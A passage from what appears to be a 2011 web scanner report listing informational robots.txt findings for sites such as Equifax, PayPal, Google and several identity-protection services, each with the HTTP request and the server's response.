Content-Length: 75
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.actividentity.com/sitemap.xml
Disallow:

29.104. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apmebf.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Wed, 23 Mar 2011 16:21:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Sun, 24 Apr 2011 03:25:39 GMT

# go away
User-agent: *
Disallow: /

29.105. http://www.arcsight.com/products/products-identity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /products/products-identity/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arcsight.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:11 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 22:47:03 GMT
ETag: "17893c-c8-4903ffdd867c0"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /collateral/copyright_notice/
Disallow: /old_site_htms/

User-agent: googlebot
Disallow: *.csi

29.106. http://www.bluewin.ch/includes/osn/mdd.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluewin.ch
Path:   /includes/osn/mdd.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluewin.ch

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:51:04 GMT
Connection: close
Content-Type: text/plain
Content-Length: 24
Accept-Ranges: bytes
Last-Modified: Thu, 23 Sep 2010 03:19:06 GMT

User-Agent: *
Disallow:

29.107. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.27.217.110
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

29.108. http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.credit.com
Path:   /r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.credit.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:09:34 GMT
Server: Apache/2
Cache-Control: private
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
ETag: "8I3lwaDI8zc"
Last-Modified: Fri, 22 Apr 2011 19:32:24 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Sun, 24 Apr 2011 20:09:39 GMT
Content-Length: 3690
Set-Cookie: crc=; path=/; expires=Mon, 25-Apr-2011 20:09:34 GMT
Set-Cookie: cuc=1303675774829*http://www.credit.com/r/home; path=/; expires=Mon, 25-Apr-2011 20:09:34 GMT
Set-Cookie: JSESSIONID=ecazNtwLJ3y0jg-wAij_s; domain=credit.com; path=/
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /jsContent/
Disallow: /jsForm/
Disallow: /subscriber/


Disallow: /news/apply-for-credit-cards/
Disallow: /news/auto-loans/
Disallow: /news/bad-credit-credit-cards/
Disallow: /
...[SNIP]...

29.109. https://www.credit.com/ufg/affRed/equifax_ws  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.credit.com
Path:   /ufg/affRed/equifax_ws

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.credit.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:13:12 GMT
Server: Apache/2
Cache-Control: private
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
ETag: "8I5M9D0LZzs"
Last-Modified: Fri, 22 Apr 2011 19:32:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Sun, 24 Apr 2011 20:13:17 GMT
Content-Length: 3690
Set-Cookie: st=-4257041015174925389; path=/; secure
Set-Cookie: crc=; path=/; expires=Mon, 25-Apr-2011 20:13:12 GMT
Set-Cookie: cuc=1303675992963*http://www.credit.com/r/home; path=/; expires=Mon, 25-Apr-2011 20:13:12 GMT
Set-Cookie: JSESSIONID=fdcD3iu42Q1ZS-3Opjj_s; domain=credit.com; path=/
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /jsContent/
Disallow: /jsForm/
Disallow: /subscriber/


Disallow: /news/apply-for-credit-cards/
Disallow: /news/auto-loans/
Disallow: /news/bad-credit-credit-cards/
Disallow: /
...[SNIP]...

29.110. http://www.creditreport.com/dni/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditreport.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 629
Content-Type: text/plain
Last-Modified: Thu, 03 Mar 2011 16:57:11 GMT
ETag: "80db79c4d9cb1:16ae"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:54:44 GMT
Set-Cookie: BIGipServercreditreport-web-pool=177360394.39455.0000; path=/
X-PvInfo: [S10203.C94085.A70609.RA0.G11456.UACBD09A4].[OT/plaintext.OG/documents]

User-agent: *
Disallow: /rt/
Disallow: /rt
Disallow: /rt?
Disallow: /dni/
Disallow: /DNI/
Disallow: /Dni/
Disallow: /Order1.aspx
Disallow: /Order2.aspx
Disallow: /images/
Disallow: /Images/
...[SNIP]...

29.111. http://www.dictof.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dictof.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:09 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Mon, 10 Jan 2011 21:59:36 GMT
ETag: "e1-49985156ce200"
Accept-Ranges: bytes
Content-Length: 225

User-agent: *
Crawl-delay: 1

Disallow: /faq/
Disallow: /faq.xhtml
Disallow: /about/
Disallow: /about.xhtml
Disallow: /terms/
Disallow: /terms.xhtml
Disallow: /privacy/
Disallow: /privacy.xh
...[SNIP]...

29.112. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emjcd.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Wed, 23 Mar 2011 16:21:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Sun, 24 Apr 2011 03:25:40 GMT

# go away
User-agent: *
Disallow: /

29.113. http://www.equifax.com/siteUnavailableCorp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equifax.com
Path:   /siteUnavailableCorp.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.equifax.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 03:54:42 GMT
Content-length: 598
Content-type: text/plain
Last-modified: Tue, 04 Jan 2011 21:50:31 GMT
Accept-ranges: bytes
Connection: close

User-agent: *

Disallow: /uiTest/

Disallow: /siteAssets/

Disallow: /US/PSOL/

Disallow: /productDemos/debtStackingDemo.html
Disallow: /debtwiseoffer/

Sitemap: http://www.equifax.com/cs/S
...[SNIP]...

29.114. https://www.equifax.com/cs/SessionPingHandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.equifax.com
Path:   /cs/SessionPingHandler

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.equifax.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 16:53:13 GMT
Content-length: 598
Content-type: text/plain
Last-modified: Tue, 04 Jan 2011 22:01:47 GMT
Accept-ranges: bytes
Connection: close

User-agent: *

Disallow: /uiTest/

Disallow: /siteAssets/

Disallow: /US/PSOL/

Disallow: /productDemos/debtStackingDemo.html
Disallow: /debtwiseoffer/

Sitemap: http://www.equifax.com/cs/S
...[SNIP]...

29.115. https://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.51.62
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

29.116. http://www.fightidentitytheft.com/credit-monitoring.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /credit-monitoring.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fightidentitytheft.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Last-Modified: Thu, 18 Mar 2010 03:36:55 GMT
ETag: "ec011-636-4820af13663c0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Sun, 08 May 2011 19:46:09 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.117. http://www.flexibilitytheme.com/images/link.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flexibilitytheme.com
Path:   /images/link.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flexibilitytheme.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:41:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.flexibilitytheme.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.flexibilitytheme.com/sitemap.xml.gz

29.118. http://www.ftjcfx.com/image-4535786-10298072  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftjcfx.com
Path:   /image-4535786-10298072

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftjcfx.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Wed, 23 Mar 2011 16:21:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 25 Apr 2011 00:46:50 GMT

# go away
User-agent: *
Disallow: /

29.119. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 24 Apr 2011 03:13:18 GMT
Expires: Sun, 24 Apr 2011 03:13:18 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

29.120. http://www.google.com/coop/cse/brand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /coop/cse/brand

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 04:09:41 GMT
Expires: Sun, 24 Apr 2011 04:09:41 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.121. http://www.googleadservices.com/pagead/conversion/1047949563/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1047949563/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sun, 24 Apr 2011 03:13:19 GMT
Expires: Sun, 24 Apr 2011 03:13:19 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.122. http://www.hostingcatalog.com/1x1s.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hostingcatalog.com
Path:   /1x1s.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hostingcatalog.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 24 Apr 2011 12:09:40 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Wed, 16 Feb 2011 21:15:19 GMT
ETag: "57c02f-7b-49c6cc72f27c0"
Accept-Ranges: bytes
Content-Length: 123

User-agent: *
Disallow: /go.php
Disallow: /*bid_on
Disallow: /*bid_off

Sitemap: http://www.hostingcatalog.com/sitemap.xml

29.123. http://www.hotelclub.com/HCRefreshAshx/HttpCombiner.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /HCRefreshAshx/HttpCombiner.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotelclub.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 697
Content-Type: text/plain
Cache-Control: private, max-age=8518
Date: Sun, 24 Apr 2011 12:09:45 GMT
Content-Length: 697
Connection: close


User-agent: *
Disallow: /SiteEngine/Common/Scripts/SEORedirect.js
Disallow: /PS/

   User-agent: *
   Disallow: /sitegen
   Disallow: /Sitegen
   Disallow: /common/
   Disallow: /Common/
...[SNIP]...

29.124. http://www.identityguard.com/gscc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /gscc.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.identityguard.com

Response

HTTP/1.1 200 OK
Content-Length: 3573
Content-Type: text/plain
Last-Modified: Thu, 17 Feb 2011 15:55:23 GMT
Accept-Ranges: bytes
ETag: "f6711a16bbcecb1:1e7c"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 03:13:15 GMT
Connection: close

...# robots.txt file for http://www.identityguard.com
User-agent: *
Disallow: /App_Code/
Disallow: /aspnet_client/
Disallow: /AssetManagement/
Disallow: /assets/
Disallow: /bin/
Disallow: /css/
...[SNIP]...

29.125. http://www.infusionblog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.infusionblog.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Vary: User-Agent,Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/plain; charset=utf-8
Date: Mon, 25 Apr 2011 01:37:13 GMT
X-Pingback: http://www.infusionblog.com/xmlrpc.php
Expires: Mon, 25 Apr 2011 02:37:13 GMT
Connection: close
Set-Cookie: X-Mapping-glbfbjch=2D76FE78CA283A10D899E757B162424B; path=/
Content-Length: 77

User-agent: *
Disallow:

Sitemap: http://www.infusionblog.com/sitemap.xml.gz

29.126. http://www.keywordmax.com/tracking/show.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keywordmax.com
Path:   /tracking/show.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keywordmax.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:37 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 01 Jul 2009 18:47:13 GMT
ETag: "20-46da959f56e40"
Accept-Ranges: bytes
Content-Length: 32
X-Server-Name: kwmweb@dc1kwmweb02
Keep-Alive: timeout=3, max=127
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow:



29.127. http://www.kqzyfj.com/click-1911961-10751987  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kqzyfj.com
Path:   /click-1911961-10751987

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kqzyfj.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Wed, 23 Mar 2011 16:21:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Sun, 24 Apr 2011 03:25:33 GMT

# go away
User-agent: *
Disallow: /

29.128. http://www.lduhtrp.net/image-4535786-10723168  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lduhtrp.net
Path:   /image-4535786-10723168

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lduhtrp.net

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Wed, 23 Mar 2011 16:21:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 25 Apr 2011 00:46:27 GMT

# go away
User-agent: *
Disallow: /

29.129. http://www.lifelock.com/about/lifelock-in-the-community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/lifelock-in-the-community/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lifelock.com

Response

HTTP/1.0 200 OK
ETag: "169f7-ef-6da47a00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Age: 76862
Date: Sun, 24 Apr 2011 03:16:40 GMT
Last-Modified: Wed, 20 Oct 2010 21:52:40 GMT
Content-Length: 239
Connection: close

User-agent: *
Disallow: /content-images/
Disallow: /css/
Disallow: /flash/
Disallow: /images/
Disallow: /inc/
Disallow: /pdf/
Disallow: /scripts/
Disallow: /common/
Disallow: /landing/
Disal
...[SNIP]...

29.130. http://www.my3bureaucreditreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.my3bureaucreditreport.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.my3bureaucreditreport.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 15 Jun 2010 00:03:15 GMT
Accept-Ranges: bytes
ETag: "a6dc271eccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:57:07 GMT
Connection: close
Content-Length: 41

User-agent: *
Disallow: /WebResource.axd

29.131. http://www.nextadvisor.com/pmid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
Last-Modified: Wed, 13 Jan 2010 19:55:02 GMT
ETag: "4808d-3b8-47d112562f180"
Accept-Ranges: bytes
Content-Length: 952
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /cct
Disallow: /404.php
Disallow: /credit_report_services/*
Disallow: /diet_services/link.php?link=weightwatchers
Disallow: /hp
Disallow: /images
Disallow: /identity_t
...[SNIP]...

29.132. https://www.paypal.com/cgi-bin/webscr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:50 GMT
Server: Apache
Set-Cookie: Apache=10.190.8.152.1303663970746041; path=/; expires=Tue, 16-Apr-41 16:52:50 GMT
Last-Modified: Wed, 31 Mar 2010 21:55:38 GMT
Accept-Ranges: bytes
Content-Length: 374
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/plain

### BEGIN FILE ###

# PayPal robots.txt file

User-agent: *
Disallow: /xclick-auction/
Disallow: /affil/
Disallow: /*?cmd=_flow
Disallow: /*?SESSION
Disallow: /*?cmd=_s-xclick
Disallow: /subscription
...[SNIP]...

29.133. http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/149142/identity_theft_monitoring_services_called_waste.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:19 GMT
Server: Apache
X-GasHost: gas1
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 328
Content-Length: 1470
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Etag: W/"1470-1297458026000"
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close

Sitemap: http://static.pcworld.com/sitemap/sitemap_index.xml
Sitemap: http://www.pcworld.com/googlenewssitemap.xml

User-agent: Googlebot
Disallow: /emailfriend
Disallow: /printable
Disallow: /r
...[SNIP]...

29.134. http://www.privacyguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privacyguard.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.privacyguard.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23
Content-Type: Text/plain; charset=utf-8
X-Served-By: FOX
Date: Sun, 24 Apr 2011 19:51:15 GMT
Connection: close

User-agent: *
Allow: /

29.135. https://www.privacyguard.com/secure/promo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /secure/promo.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.privacyguard.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23
Content-Type: Text/plain; charset=utf-8
X-Served-By: MAPLE
Date: Sun, 24 Apr 2011 20:21:06 GMT
Connection: close

User-agent: *
Allow: /

29.136. http://www.reputationengineer.com/internet-reputation-management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationengineer.com
Path:   /internet-reputation-management/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reputationengineer.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:37:06 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.reputationengineer.com/xmlrpc.php
Set-Cookie: PHPSESSID=cb481adc0c502ad11859f8d1f35bc641; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.reputationengineer.com/sitemap.xml.gz

29.137. http://www.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.securepaynet.net

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:43:22 GMT
Connection: close
Content-Length: 81

#
# robots.txt
#
User-agent: Googlebot
Disallow: /
#
User-agent: *
Disallow: /
#

29.138. https://www.securepaynet.net/gdshop/basket.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.securepaynet.net
Path:   /gdshop/basket.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.securepaynet.net

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:47 GMT
Connection: close
Content-Length: 81

#
# robots.txt
#
User-agent: Googlebot
Disallow: /
#
User-agent: *
Disallow: /
#

29.139. http://www.silverlight.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.silverlight.net

Response

HTTP/1.1 200 OK
Content-Length: 53
Content-Type: text/plain
Last-Modified: Wed, 13 Apr 2011 02:24:08 GMT
Accept-Ranges: bytes
ETag: "054f3dd81f9cb1:0",""
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:52:58 GMT
Connection: close

...User-agent: *
Disallow: /search/
Disallow: /cms/

29.140. http://www.swisscom.ch/residential  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /residential

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.swisscom.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:50:49 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.168891303671049216; path=/
Last-Modified: Fri, 18 Jul 2008 14:37:23 GMT
ETag: "1b013-164-4880aaa3"
Accept-Ranges: bytes
Content-Length: 356
Connection: close
Content-Type: text/plain

#
# robots.txt: please contact webmaster@swisscom.com for
# further information
#
User-Agent: Ultraseek
Disallow:
#
User-Agent: search.ch
Disallow:
#
User-Agent: *
Disallow: /solutions/red
...[SNIP]...

29.141. http://www.tqlkg.com/image-1911961-10775457  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /image-1911961-10775457

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Wed, 23 Mar 2011 16:21:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Sun, 24 Apr 2011 04:09:52 GMT

# go away
User-agent: *
Disallow: /

29.142. https://www.trustedid.com/idfide01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trustedid.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:19 GMT
Server: Apache
